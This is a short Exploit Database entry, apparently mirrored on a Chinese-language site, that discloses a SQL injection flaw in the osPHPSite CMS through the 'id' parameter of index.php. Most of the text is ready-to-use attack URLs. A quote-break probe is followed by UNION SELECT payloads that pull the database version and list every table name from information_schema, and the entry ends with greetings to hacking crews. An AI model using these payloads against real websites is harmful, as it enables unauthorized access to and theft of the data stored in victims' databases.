osPHPSite – SQL Injection

• Exploit Database
• 16 阅读

• 作者： vir0e5
  日期： 2011-04-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17183/

• # Exploit Title: osPHPSite SQL Injection Vulnerability
  # Author: vir0e5
  # Date: 1-12-2011
  # Vendor: http://www.osphpsite.com
  # Software Link: http://sourceforge.net/projects/osphpsite
  # Version: ALL VERSION
  
  
  [ Vulnerable File ]
  ~ index.php
  
  [ Exploit ]
  ~ http://www.[sitename].com/index.php?id=[Sql Injection]
  
  [ example ]
  ~ http://www.[sitename].com/index.php?id=24'
  ~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,@@VERSION,3,4,5,6,7,8-- 
  ~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 +from+information_schema.tables+where+table_schema =database()--
  ~ And More.....
  
  
  
  ********************************************
  [+] Greetings :[ mywisdom - kiddies - kamtiez - r3m1ck - aciz_n1nj4 | mozartklik |syafm0vic- skuteng_boy - blue_screen - agdi_cool - dangercode14045 - dewancc and YOU!!!! ] ;
  
  [+] Forum [as member] : http://indonesian-cyber.org | http://tecon-crew.org | http://devilzc0de.org | http://santricyber.org | http://indonesiancoder.com | http://cyber4rt.com And OTHER's
  
  
  Cause i'm Alone!!